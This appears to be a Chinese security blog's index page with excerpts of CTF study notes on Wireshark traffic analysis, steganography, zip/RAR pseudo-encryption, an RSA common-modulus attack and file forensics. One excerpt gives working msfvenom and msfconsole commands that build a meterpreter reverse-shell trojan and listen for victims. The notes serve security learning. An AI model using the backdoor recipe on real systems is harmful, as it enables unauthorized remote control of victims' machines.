HappyCoder'Home

HTTP基础知识http协议的特点:基于tcp/ip协议默认端口号为80请求与响应一一对应每次请求相互独立，是无状态协议(这也是为什么需要cookie) HTTP常用有八种请求方式，常用get和postget请求：请求参数在url地址中，url有长度限制；get方式只能传输字符型的数据post请求：请求参数在请求体中，无大小限制；post方式能传输字符和字节型数据(当你想要上传一张图片或音乐必须使用post方式) GET产生一个数据包，POST产生两个数据包。对于GET请求，浏览器会把http header和data一并发出去，服务器相应200（返回数据）。而对于POST，浏览器先发送header，服务器响应100 continue，浏览器再发送data，服务器响应200 ok。 响应状态码：服务器告诉浏览器本次请求和响应的状态1×× ：服务器接收浏览器消息未完成，发送1××状态码2×× ：成功，2003×× ：重定向，302，,3044×× ：客户端错误，404(没有找到对应资源)，405(请求方法不被允许)5×× ：服务器错误，500(服务器内部出现异常) X-Forwarde ...

1、功夫再高也怕菜刀 开始追踪流 flag.txt找了半天没找到到底要怎么才能获取直接导出http对象 1(22).php很大，打开看一下 看到了这个png的文件头，把从文件头开始到文件末尾复制到一个新的txt文本，导入到010editor中，再导出为png 我以为这就是flag了，没想到不是，看别人的wp，知道pacp下面还有一个压缩包用binwalk分离不行，会得到很多东西，必须使用foremost分离，得到一个压缩包，密码就是刚才得到的图片，得到flag 2、wireshark-1 导出HTTP对象 题目提示管理员登录网站的密码，所以看后三个和登录有关的文件。我先看了两个较大一点的，都是网站登录页面的html文件，打开第三个，passwd就直接写在里面了 3、easycap 打开，追踪流得到FLAGflag是FLAG:385b87afc8671dee07550290d16a8071 4、buuctf VoIP题目是voipIP电话的意思 有SIP、RTP 都可以直接听到通话 5、buu-荷兰宽带数据泄露这一题给出的是.bin文件，wireshark打不开.bin ...

wireshark过滤器1、过滤IPip.src eq x.x.x.x or ip.dst eq x.x.x.x 或者 ip.addr eq x.x.x.x 2、过滤端口tcp.port eq 80 or udp.port eq 80tcp.dstport == 80 只显tcp协议的目标端口为80tcp.scrport == 80 只显tcp协议的源端口为80tcp.port >=1 and tcp.port<=80 3、过滤协议tcp/udp/arp/icmp/http/ftp/dns/ip…… 4、包长度过滤一般长度较小的包，可能不会藏太多东西udp.length == 26tcp.len >= 7ip.len == 94frame.len == 119 整个数据包的长度，从eth开始到最后 5、过滤MACeth.dst == A0:00:00:04:C5:84 过滤目标mac 6、http模式过滤http.request.method == “GET”http.request.method == “POST”http.request. ...

1、a_good_idea先010editor看，右栏Ascii很容易就看到很多misc，to_do.png之类的，binwalk分离得到压缩包，两张一模一样的图片和一个提示文档对像素进行操作。stegsolve里面，进行combine但是什么都看不出来，两个图片互换位置也都试过了。然后上网看了别人的wp之后才知道XOR之后，把曝光调到最后，得到一张二维码。这个想法，所以我想记录一下。 [图像]->[调整]->[曝光度] 2、Training-Stegano-1拿到图片，丢入010editor 大道至简，这题的flag就是steganoI，不需要套flag{}，记录这题想告诉我自己不要想太多吧，这题已经说了passwd: 了 3、pure_color首先题目名字color有关，拿到图片是一张纯白得图片，很容易想到LSB 但是图片看起来只有半截，先爆破了一下宽高，发现没有问题，在试试LSB 什么也没有只拿到了Adobe ImageReady，猜测和ps有关，搜了一下 打开PS[图像]->[自动色调]即可得到flag 4、stage1丢进stegsolve ...

1、msfvenom生成远控木马msfvenom是用来生成后门软件，在目标机上执行后门，在本地监听上线。(msfvenom在shell里使用，不是在msfconsole终端) msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.88.123 lport=9999 -f exe -o demo.exelhost攻击机的地址，lport：1~65535自己任选，不要选已在工作中的端口 查询kali的ip地址ifconfig或ip add 现在木马就生成好了 再点击open folder就可以看到demo.exe了 2、开启监听在msfconsole中开启监听，等待受害者运行上钩use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lhost 192.169.88.123 (注意空格不要多输)set lport 9999run

攻击条件当两个用户使用相同的模数N、不同的私钥时，加密同一明文消息时，即存在同模攻击 攻击原理设两个用户的公钥分别为e1和e2，且两者互质。明文信息为m，密文分别为: ​ 当攻击者截获c1和c2后，就可以恢复出明文。用扩展欧几里得算法求出re1+se2=1 mod n 的两个整数r和s，由此可得: ​ 例题 123456789101112131415161718192021import gmpy2from Crypto.Util.number import *#数字n、c1、c2都太长了，我直接去了n=e1= 2333e2= 23333c1=c2=gcd, s, t = gmpy2.gcdext(e1, e2)#广义欧几里得求出s,t gcdext返回值为e1,e2最 ...

拿到压缩包里面只有一个flag.txt内容为flag is not here 把压缩包丢入010editor 这是上一篇压缩文件分析中提到的的，有时候给出的RAR文件的头部各个字块会故意给错导致无法识别文件块的第三个字节为类型块，也叫头类型头类型是0x72表示是标记块头类型是0x73表示是压缩文件头块头类型是0x74表示是文件头块头类型是0x75表示是注释头块 因为flag.txt文件的内容为flag is not here，所以可以找到下一个文件的文件头，把7A改成74即可看到了secret.png 查看exif无果，把secret丢入010editor中，文件头是gif类型的，更改后缀名(但其实不更改也可以正常打开，我也不知道为啥)，然后看不出来什么了。 把图片丢入stegsolve中，更改颜色通道,看到了这个 这里我还在想是不是高度错误了，尝试爆破宽高不知道为 ...

1、伪加密如果压缩文件是加密的，或文件头正常但解压缩错误，首先尝试文件是否为伪加密。zip文件是否加密是通过标识符来显示的，在每个文件的文件目录字段有一位专门标识了文件是否加密，将其设置为00表示该文件未加密，如果成功解压则表示文件为伪加密，如果解压出错说明文件为真加密 操作方法：使用winhex或010editor，找到文件头第九第十个字符，将其修改为0000. (其中50是第一个字符)1、使用winhex打开文件搜索十六进制504B0102，可以看到每个加密文件的文件头字段2、从50开始，第九个第十个字符为加密字段，将其设置为0000即可变为无加密状态 1234567891011无加密压缩源文件数据区的全局加密应当为00 00且压缩源文件目录区的全局方式位标记应当为00 00伪加密 压缩源文件数据区的全局加密应当为00 00 且压缩源文件目录区的全局方式位标记应当为09 00真加密 压缩源文件数据区的全局加密应当为09 00且压缩源文件目录区的全局方式位标记应当为09 00 3、RAR文件由于有头部检验，使用伪加密时打开文件会出现报错，使用win ...

1、LSB(最低有效位Least Significant Bit)LSB替换隐写基本思想使用嵌入的秘密信息取代载体图像的最低比特位，原来的7个高位平面与替代秘密信息的最低位平面组成含隐藏信息的新图形 例如在PNG图片的储存中，每个颜色会有8bit，LSB隐写就是修改了像素中的最低的1bit。在人眼中看来是看不住来区别的，也把信息隐藏起来了。如：把A转成16进制的0*61在转成二进制的01100001，在修改为红色通道的最低位为这些二进制串。像素三原色(RGB)通过修改像素中最低为的1bit来达到隐藏的效果工具:stegsolve、zsteg、wbstego4(通常用于.bmp和.pdf)、Python脚本 因为不确定Red、Blue、Green的排列顺序，所以需要依次选择RGB、BGR…… zsteg(这个方法很厉害)zsteg是一个命令行工具，linux下输入gem install zsteg进行安装使用:zsteg 图片名zsteg会把所有可能情况RGB、BGR……中的文本信息依次显示出来 工具cloacked-pixel （用这个工具解密lsb是需要有密码的，所以一般有密码的 ...

文件类型识别、取证1、file命令当文件没有后缀名或者有后缀名而无法正常打开时，根据识别出的文件类型来修改后缀名即可正常打开文件(在Linux操作系统下使用该命令)格式: file 文件名 2、strings命令打印文件中可打印的字符，经常用来发现文件中的一些提示信息或是一些特殊的编码信息，常常用来发现题目的突破口配合grep命令探测指定信息：strings 文件名 | grep -i XXCTF例如：strings webshell.pcapng | grep { #查找带有{ 的字符串 3、十六进制查看器通过winhex、010editor或notepad++可以查看文件头类型，根据文件头类型判断出文件类型 12345678910111213141516171819202122232425262728293031JPEG (jpg)， 　　文件头：FFD8FF　　　　　　　　　　　　　　PNG (png)， 　　 文件头：89504E47 文件尾：00000000 ...